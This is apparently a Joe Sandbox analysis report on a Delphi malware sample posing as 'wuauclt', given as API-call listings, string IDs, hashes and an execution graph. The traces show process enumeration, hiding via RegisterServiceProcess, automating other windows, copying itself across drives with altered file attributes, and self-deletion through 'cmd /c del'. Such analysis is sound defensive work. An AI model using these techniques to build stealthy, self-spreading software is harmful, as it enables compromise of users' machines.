• GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004045C6
• GetProcAddress.KERNEL32(00000000,Process32First), ref: 004045D8
• GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004045EA
• GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004045FC
• GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0040460E
• GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00404620
• GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00404632
• GetProcAddress.KERNEL32(00000000,Module32First), ref: 00404644
• GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00404656
• GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 00404668
• GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0040467A
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
APIs
  • Part of subcall function 00404F2C: GetWindowsDirectoryA.KERNEL32(?,00000104,?,00407C31,00000000,00407D2A,?,00000000,00000000,00000000,00000000,00000000), ref: 00404F3F
• FindWindowA.USER32(#32770,00000000), ref: 00406CE5
• GetWindowTextA.USER32(00000000,0040AEDC,00000104), ref: 00406D17
• FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406DC3
• FindWindowExA.USER32(00000000,00000000,AfxWnd42,00000000), ref: 00406DE1
• FindWindowExA.USER32(00000000,00000000,RICHEDIT,00000000), ref: 00406DFF
• FindWindowExA.USER32(00000000,00000000,Button,00406F50), ref: 00406E20
• FindWindowExA.USER32(00000000,00000000,RichEdit20A,00000000), ref: 00406E3E
• SendMessageA.USER32(00000000,000000C2,000000B4,00000000), ref: 00406E7E
• Sleep.KERNEL32(000002BC,00000000,000000C2,000000B4,00000000,00000000,00000000,RichEdit20A,00000000,00000000,00000000,Button,00406F50,00000000,00000000,RICHEDIT), ref: 00406E88
• SendMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00406E9E
• SendMessageA.USER32(00000000,0000000C,00000000,00406F70), ref: 00406EB4
• FindWindowExA.USER32(00000000,00000000,#32770,00000000), ref: 00406ECC
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: Window$Find$MessageSend$DirectorySleepTextWindows
• String ID: #32770$AfxWnd42$Button$RICHEDIT$RichEdit20A$bbyb.dll
• API String ID: 4044579835-3821104793
APIs
• CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402613
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040261D
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040263A
• CharNextA.USER32(00000000,?,00000000,00000000,?,0040270E), ref: 00402644
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040266D
• CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 00402677
• CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040270E), ref: 0040269B
• CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040270E), ref: 004026A5
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CharNext
• String ID: "$"
• API String ID: 3213498283-3758156766
APIs
• RtlEnterCriticalSection.NTDLL(0040A5B0), ref: 004018A9
• LocalFree.KERNEL32(006832B8,00000000,00401952), ref: 004018BB
• VirtualFree.KERNEL32(?,00000000,00008000,006832B8,00000000,00401952), ref: 004018DA
• LocalFree.KERNEL32(006842B8,?,00000000,00008000,006832B8,00000000,00401952), ref: 00401919
• RtlLeaveCriticalSection.NTDLL(0040A5B0), ref: 00401942
• RtlDeleteCriticalSection.NTDLL(0040A5B0), ref: 0040194C
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
• String ID: Hh
• API String ID: 3782394904-2683877627
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005,00000000), ref: 0040388D
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403922,?,?,?,00000002,004039C2,00402507,0040254F,00000005), ref: 00403893
• GetStdHandle.KERNEL32(000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403922), ref: 004038A8
• WriteFile.KERNEL32(00000000,000000F5,004038DC,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403922), ref: 004038AE
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004038CC
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
APIs
• GetClassNameA.USER32(?,?,00000100), ref: 00405443
• SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
• SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: MessageSend$ClassName
• String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
• API String ID: 787153527-2237947760
APIs
• GetClassNameA.USER32(?,?,00000100), ref: 00405443
• SendMessageA.USER32(?,0000000D,00000100,?), ref: 0040547E
• SendMessageA.USER32(?,0000000C,00000000,00405588), ref: 004054F9
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
Similarity
• API ID: MessageSend$ClassName
• String ID: Edit$lqrs>*)tsr(gra`lvjhf*fin+$lqrs>*)tsr(lj``lvapg*fin+
• API String ID: 787153527-2237947760
APIs
• GetVersionExA.KERNEL32(?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049DA
• LoadLibraryA.KERNEL32(kernel32.dll,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 004049F5
• GetProcAddress.KERNEL32(00000000,RegisterServiceProcess), ref: 00404A13
• FreeLibrary.KERNEL32(00000000,?,00408D88,00000000,00000000,00000000,00000000,00400000,00000000,00000104,00000000,00000080,bbyb,bbyb,00000000,00408DA8), ref: 00404A2D
Strings
Memory Dump Source
• Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProcVersion
                                                                            • String ID: RegisterServiceProcess$kernel32.dll
                                                                            • API String ID: 493525861-4020013434
                                                                            • Opcode ID: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
                                                                            • Instruction ID: 584902bb4f43a048dfb4edc9276af123f762f69e99b58a94aa2e669f31c097c7
                                                                            • Opcode Fuzzy Hash: ba7912c793e05f345d12aa31dfe9059e509e26ea0c3e34657816526bc27800df
                                                                            • Instruction Fuzzy Hash: F6F012F17C13009BD611EB759E0AB1932A4E7E4706F40447BB784B72D1E77D8456CA1E
                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403196
                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031C9
                                                                            • RegCloseKey.ADVAPI32(?,004031EC,00000000,?,00000004,00000000,004031E5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004031DF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpenQueryValue
                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                            • API String ID: 3677997916-4173385793
                                                                            • Opcode ID: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
                                                                            • Instruction ID: 5b13f427154e47eb786ec22587604168a85df8ea8a10eb055b4820c5abfa16c8
                                                                            • Opcode Fuzzy Hash: 05a39cdded3a68a7272965c21735343be09680b9c2fcd28f0635233796265c19
                                                                            • Instruction Fuzzy Hash: 7A019275500308BADB11DF909C42FAA7BBCE709701F6005B6B910F65D1E6799B50D75C
                                                                            APIs
                                                                            • GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
                                                                              • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
                                                                            • WinExec.KERNEL32(00000000,004051C8), ref: 00405174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExecFileModuleNameVariable
                                                                            • String ID: /c del "$Comspec
                                                                            • API String ID: 451393584-1443122049
                                                                            • Opcode ID: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
                                                                            • Instruction ID: 6f675109087fc91689d1b7d6d1dc425710a191357d6ada5f1f571d808edafb71
                                                                            • Opcode Fuzzy Hash: 215997d5803e9b59eb04cb7df286bba4695a682e93fbde3f27ae696503c78bdd
                                                                            • Instruction Fuzzy Hash: 74118270E006185FDB25EB61CC02BDABBB9EB49700F5145FBA648F61C1D6F84A808E65
                                                                            APIs
                                                                            • GetEnvironmentVariableA.KERNEL32(Comspec,?,00000104,00000000,00405197), ref: 00405118
                                                                              • Part of subcall function 004026C8: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 004026EC
                                                                            • WinExec.KERNEL32(00000000,004051C8), ref: 00405174
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: EnvironmentExecFileModuleNameVariable
                                                                            • String ID: /c del "$Comspec
                                                                            • API String ID: 451393584-1443122049
                                                                            • Opcode ID: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
                                                                            • Instruction ID: 5e39bd01bb10aff84b20b8e8c33debca7a73d60c2ec277af15caf5139dfd1cd6
                                                                            • Opcode Fuzzy Hash: e562fe7082f41e4b9f578b462bb6e237adde477b1983bc868482d80e88f8d696
                                                                            • Instruction Fuzzy Hash: 5E116170E0061C5FDB25EB61CC02BDABBB9EB48700F5145F6A608F61C1E6F85A808E69
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004), ref: 00401352
                                                                            • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004), ref: 00401377
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004), ref: 0040139D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.3252810810.0000000000401000.00000004.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.3252769895.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.000000000042B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000431000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252810810.0000000000437000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3252983659.0000000000438000.00000040.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000004.00000002.3253040410.0000000000446000.00000080.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_400000_wuauclt.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Alloc$Free
                                                                            • String ID: Hh
                                                                            • API String ID: 3668210933-2683877627
                                                                            • Opcode ID: ed0e3a9f715c948686bb42752dba42d67e7306a1d16e972f05cb686e700d65a0
                                                                            • Instruction ID: 1443cfa43066ccea577914be50a13efbb011f244d1dbdc7e12d8ece426878d7c
                                                                            • Opcode Fuzzy Hash: ed0e3a9f715c948686bb42752dba42d67e7306a1d16e972f05cb686e700d65a0
                                                                            • Instruction Fuzzy Hash: 29F0C8B17403206BE7315A694C86F433AD49F45754F144076BB08FF7DAD6B95800826C

                                                                            Execution Graph

                                                                            Execution Coverage: 26.1%
                                                                            Dynamic/Decrypted Code Coverage: 3.1%
                                                                            Signature Coverage: 0%
                                                                            Total number of Nodes: 1557
                                                                            Total number of Limit Nodes: 41
                                                                            execution_graph 5427 439cc7 5428 439ced 5427->5428 5429 439d06 VirtualAlloc 5428->5429 5431 439d2a 5429->5431 5434 439d46 5431->5434 5433 439d3e 5436 439d9b 5434->5436 5435 439e3f 5435->5433 5436->5435 5437 439e05 LoadLibraryA 5436->5437 5437->5436 6827 4084c8 6828 406f74 50 API calls 6827->6828 6829 4084cd 6828->6829 6840 40558c FindWindowA 6829->6840 6833 4084d7 6836 4084ef 6833->6836 6881 405fb0 6833->6881 6835 408511 6836->6835 6837 404d04 GetVersionExA 6836->6837 6838 408507 6837->6838 6838->6835 6931 406354 6838->6931 6841 4055a5 EnumChildWindows 6840->6841 6842 4055c8 6840->6842 6843 4055bb FindWindowExA 6841->6843 6845 406c30 6842->6845 6844 4055c4 6843->6844 6844->6841 6844->6842 6846 404f2c 18 API calls 6845->6846 6847 406c62 6846->6847 6848 403b5c 17 API calls 6847->6848 6849 406c6f 6848->6849 6850 404cf4 4 API calls 6849->6850 6851 406c77 6850->6851 6852 406ee7 6851->6852 6853 406c7f 6851->6853 6855 4039f4 17 API calls 6852->6855 6854 404f2c 18 API calls 6853->6854 6856 406c87 6854->6856 6857 406f01 6855->6857 6858 403b5c 17 API calls 6856->6858 6857->6833 6859 406c94 6858->6859 6860 4027bc 4 API calls 6859->6860 6861 406cab 6860->6861 6862 402560 4 API calls 6861->6862 6863 406cb0 6862->6863 6864 402dec 17 API calls 6863->6864 6865 406cc0 6864->6865 6866 402e58 4 API calls 6865->6866 6867 406cca 6866->6867 6868 402560 4 API calls 6867->6868 6869 406ccf 6868->6869 6870 402ba8 4 API calls 6869->6870 6871 406cd9 6870->6871 6872 402560 4 API calls 6871->6872 6873 406cde FindWindowA 6872->6873 6873->6852 6874 406d00 GetWindowTextA 6873->6874 6875 403b3c 17 API calls 6874->6875 6879 406d32 6875->6879 6876 406ebb FindWindowExA 6876->6852 6876->6874 6877 406db2 FindWindowExA FindWindowExA FindWindowExA FindWindowExA FindWindowExA 6877->6876 6877->6879 6878 403b3c 17 API calls 6878->6879 6879->6876 6879->6877 6879->6878 6880 406e6b SendMessageA Sleep SendMessageA SendMessageA 6879->6880 
6880->6876 6885 405fb8 6881->6885 6882 40601a GetDriveTypeA 6882->6885 6883 406283 6886 4039f4 17 API calls 6883->6886 6884 403ba0 17 API calls 6884->6885 6885->6882 6885->6883 6885->6884 6887 404cf4 4 API calls 6885->6887 6893 406045 6885->6893 6888 40629d 6886->6888 6887->6885 6889 4039d0 17 API calls 6888->6889 6890 4062a5 6889->6890 6890->6836 6891 403ba0 17 API calls 6891->6893 6892 404cf4 4 API calls 6892->6893 6893->6891 6893->6892 6894 4060c3 SetFileAttributesA 6893->6894 6896 406061 6893->6896 6895 403ba0 17 API calls 6894->6895 6897 4060de 6895->6897 6898 403ba0 17 API calls 6896->6898 6900 4060e6 SetFileAttributesA 6897->6900 6899 406073 6898->6899 6902 40607b SetFileAttributesA 6899->6902 6901 403ba0 17 API calls 6900->6901 6903 4060fc 6901->6903 6904 403ba0 17 API calls 6902->6904 6906 406104 DeleteFileA 6903->6906 6905 406093 6904->6905 6908 40609b SetFileAttributesA 6905->6908 6907 403ba0 17 API calls 6906->6907 6909 40611a 6907->6909 6908->6883 6910 406122 DeleteFileA 6909->6910 6911 403e74 17 API calls 6910->6911 6912 406134 6911->6912 6913 406140 GetModuleFileNameA 6912->6913 6914 403e74 17 API calls 6913->6914 6916 406155 6914->6916 6915 403ba0 17 API calls 6915->6916 6916->6915 6917 406177 CopyFileA 6916->6917 6918 403ba0 17 API calls 6917->6918 6926 40618d 6918->6926 6919 4027c8 4 API calls 6919->6926 6920 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6920->6926 6921 4027d4 4 API calls 6921->6926 6922 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6922->6926 6923 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6923->6926 6924 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6924->6926 6925 403ba0 17 API calls 6925->6926 6926->6919 6926->6920 6926->6921 6926->6922 6926->6923 6926->6924 6926->6925 6927 406253 SetFileAttributesA 6926->6927 6928 403ba0 17 API calls 6927->6928 6929 40626b 6928->6929 6930 406273 SetFileAttributesA 6929->6930 6930->6885 6935 40635c 6931->6935 6932 4063be GetDriveTypeA 6932->6935 6933 403ba0 
17 API calls 6933->6935 6934 406627 6936 4039f4 17 API calls 6934->6936 6935->6932 6935->6933 6935->6934 6937 404cf4 4 API calls 6935->6937 6944 4063e9 6935->6944 6938 406641 6936->6938 6937->6935 6939 4039d0 17 API calls 6938->6939 6941 406649 6939->6941 6940 403ba0 17 API calls 6940->6944 6941->6835 6942 404cf4 4 API calls 6942->6944 6943 406467 SetFileAttributesA 6945 403ba0 17 API calls 6943->6945 6944->6940 6944->6942 6944->6943 6946 406405 6944->6946 6948 406482 6945->6948 6947 403ba0 17 API calls 6946->6947 6949 406417 6947->6949 6950 40648a SetFileAttributesA 6948->6950 6952 40641f SetFileAttributesA 6949->6952 6951 403ba0 17 API calls 6950->6951 6953 4064a0 6951->6953 6954 403ba0 17 API calls 6952->6954 6956 4064a8 DeleteFileA 6953->6956 6955 406437 6954->6955 6958 40643f SetFileAttributesA 6955->6958 6957 403ba0 17 API calls 6956->6957 6959 4064be 6957->6959 6958->6934 6960 4064c6 DeleteFileA 6959->6960 6961 403e74 17 API calls 6960->6961 6962 4064d8 6961->6962 6963 4064e4 GetModuleFileNameA 6962->6963 6964 403e74 17 API calls 6963->6964 6966 4064f9 6964->6966 6965 403ba0 17 API calls 6965->6966 6966->6965 6967 40651b CopyFileA 6966->6967 6968 403ba0 17 API calls 6967->6968 6976 406531 6968->6976 6969 4027c8 4 API calls 6969->6976 6970 403ba0 17 API calls 6970->6976 6971 4027d4 4 API calls 6971->6976 6972 4030f4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6972->6976 6973 402560 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6973->6976 6974 403ed8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6974->6976 6975 402ba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6975->6976 6976->6969 6976->6970 6976->6971 6976->6972 6976->6973 6976->6974 6976->6975 6977 4065f7 SetFileAttributesA 6976->6977 6978 403ba0 17 API calls 6977->6978 6979 40660f 6978->6979 6980 406617 SetFileAttributesA 6979->6980 6980->6935 6985 43834b 6986 43835e VirtualFree 6985->6986 6989 438408 6986->6989 6993 438524 6989->6993 6990 438518 6991 4384f9 VirtualProtect 6991->6990 6991->6991 
6995 43844c 6993->6995 6996 438532 6993->6996 6994 438550 LoadLibraryA 6994->6995 6994->6996 6995->6990 6995->6991 6996->6994 6996->6995 7224 43814a 7225 438159 7224->7225 7227 4381fa 7225->7227 7229 438214 7227->7229 7228 43851d 7228->7225 7229->7228 7230 438231 VirtualAlloc 7229->7230 7230->7228 7231 438273 7230->7231 7232 43827e 3 API calls 7231->7232 7232->7228 5438 408bd4 5439 408bdc 5438->5439 5439->5439 5495 4041b0 GetModuleHandleA 5439->5495 5442 408c45 5499 404f2c GetWindowsDirectoryA 5442->5499 5443 408c0f FindWindowA PostMessageA FindWindowA SendMessageA 5443->5442 5447 408c5f 5448 408c67 SetFileAttributesA 5447->5448 5518 403e74 5448->5518 5450 408c7c 5451 408c8d GetModuleFileNameA 5450->5451 5452 403e74 17 API calls 5451->5452 5453 408ca5 5452->5453 5454 404f2c 18 API calls 5453->5454 5455 408cad 5454->5455 5456 403b5c 17 API calls 5455->5456 5457 408cba 5456->5457 5458 408cc2 DeleteFileA 5457->5458 5459 404f2c 18 API calls 5458->5459 5460 408cd2 5459->5460 5461 403b5c 17 API calls 5460->5461 5462 408cdf 5461->5462 5463 408cf4 CopyFileA 5462->5463 5524 404a64 5463->5524 5466 404f2c 18 API calls 5467 408d15 5466->5467 5468 403b5c 17 API calls 5467->5468 5469 408d22 5468->5469 5470 404a64 18 API calls 5469->5470 5471 408d2d 5470->5471 5472 408d38 5471->5472 5473 408d79 5471->5473 5475 404d98 18 API calls 5472->5475 5530 404d98 5473->5530 5477 408d3d 5475->5477 5479 406928 26 API calls 5477->5479 5481 408d42 5479->5481 5483 404f2c 18 API calls 5481->5483 5485 408d50 5483->5485 5484 408d88 5620 408a20 LoadIconA LoadCursorA RegisterClassA 5484->5620 5487 403b5c 17 API calls 5485->5487 5489 408d5d 5487->5489 5488 408d8d 5640 4039f4 5488->5640 5491 408d65 ShellExecuteA 5489->5491 5629 407d8c 5491->5629 5494 408d77 5494->5488 5496 4041e3 5495->5496 5644 403788 5496->5644 5500 403b3c 17 API calls 5499->5500 5501 404f52 5500->5501 5502 404f6e 5501->5502 5503 403b5c 17 API calls 5501->5503 5504 403b5c 5502->5504 5503->5502 5505 403b60 5504->5505 5506 403b9f 
5504->5506 5507 403a24 5505->5507 5508 403b6a 5505->5508 5506->5447 5514 403a94 17 API calls 5507->5514 5515 403a38 5507->5515 5509 403b94 5508->5509 5510 403b7d 5508->5510 5512 403e74 17 API calls 5509->5512 5513 403e74 17 API calls 5510->5513 5511 403a66 5511->5447 5517 403b82 5512->5517 5513->5517 5514->5515 5515->5511 5516 40248c 17 API calls 5515->5516 5516->5511 5517->5447 5519 403e81 5518->5519 5523 403eb1 5518->5523 5521 403e8d 5519->5521 5522 403a94 17 API calls 5519->5522 5520 4039d0 17 API calls 5520->5521 5521->5450 5522->5523 5523->5520 5525 404a72 5524->5525 6724 403ac0 5525->6724 5528 404a93 5528->5466 5529 404a8a CharUpperBuffA 5529->5528 5531 403e74 17 API calls 5530->5531 5532 404da7 5531->5532 5533 404db6 GetModuleFileNameA 5532->5533 5534 403e74 17 API calls 5533->5534 5535 404dce 5534->5535 5536 406928 5535->5536 5537 406930 5536->5537 6729 402f90 5537->6729 5540 402560 4 API calls 5541 40697c 5540->5541 6733 402c3c 5541->6733 5544 402560 4 API calls 5545 40698c 5544->5545 6741 402fac 5545->6741 5547 40699c 5548 402560 4 API calls 5547->5548 5549 4069a1 5548->5549 6748 402b88 5549->6748 5552 402560 4 API calls 5553 4069ba 5552->5553 5554 402c3c 6 API calls 5553->5554 5555 4069d8 5554->5555 5556 402560 4 API calls 5555->5556 5557 4069dd 5556->5557 5558 402fac 6 API calls 5557->5558 5559 4069ef 5558->5559 5560 402560 4 API calls 5559->5560 5561 4069f4 5560->5561 5562 402b88 6 API calls 5561->5562 5563 406a1b 5562->5563 5564 402560 4 API calls 5563->5564 5565 406a20 5564->5565 5566 403ac0 17 API calls 5565->5566 5567 406a36 5566->5567 6751 404d48 5567->6751 5572 404dd0 17 API calls 5573 406a6a 5572->5573 5574 403a24 17 API calls 5573->5574 5575 406a7a 5574->5575 5576 403da4 17 API calls 5575->5576 5577 406a95 5576->5577 5578 404dd0 17 API calls 5577->5578 5579 406aa6 5578->5579 5580 403a24 17 API calls 5579->5580 5581 406ab6 5580->5581 5582 403da4 17 API calls 5581->5582 5583 406ad3 5582->5583 5584 404dd0 17 API calls 5583->5584 5585 406ae4 
5584->5585 5586 403a24 17 API calls 5585->5586 5587 406af4 5586->5587 5588 403da4 17 API calls 5587->5588 5589 406b11 5588->5589 5590 404dd0 17 API calls 5589->5590 5591 406b22 5590->5591 5592 403a24 17 API calls 5591->5592 5593 406b32 5592->5593 5594 403da4 17 API calls 5593->5594 5595 406b4f 5594->5595 5596 404dd0 17 API calls 5595->5596 5597 406b60 5596->5597 5598 403a24 17 API calls 5597->5598 5599 406b70 5598->5599 5600 403da4 17 API calls 5599->5600 5601 406b8d 5600->5601 5602 404dd0 17 API calls 5601->5602 5603 406b9e 5602->5603 5604 403a24 17 API calls 5603->5604 5605 406bae 5604->5605 5606 403da4 17 API calls 5605->5606 5607 406bcb 5606->5607 5608 404dd0 17 API calls 5607->5608 5609 406bdc 5608->5609 5610 403a24 17 API calls 5609->5610 5611 406bec 5610->5611 5612 402ba8 4 API calls 5611->5612 5613 406bf7 5612->5613 5614 402560 4 API calls 5613->5614 5615 406bfc 5614->5615 5616 4039f4 17 API calls 5615->5616 5617 406c19 5616->5617 5618 4039d0 17 API calls 5617->5618 5619 406c21 5618->5619 5634 4049cc GetVersionExA 5619->5634 5621 408b10 5620->5621 5622 408a88 5620->5622 5621->5488 6790 404414 CreateWindowExA 5622->6790 5624 408aae 5624->5621 5625 408abc SetTimer 5624->5625 5626 408aeb GetMessageA 5625->5626 5627 408afb KillTimer 5626->5627 5628 408adf TranslateMessage DispatchMessageA 5626->5628 5627->5621 5628->5626 5630 407d9d 5629->5630 5632 407da5 5630->5632 6791 4050dc GetEnvironmentVariableA 5630->6791 5632->5494 5635 404a32 5634->5635 5636 4049e9 5634->5636 5635->5484 5636->5635 5637 4049f0 LoadLibraryA 5636->5637 5637->5635 5638 404a08 GetProcAddress 5637->5638 5639 404a27 FreeLibrary 5638->5639 5639->5635 5641 4039fa 5640->5641 5642 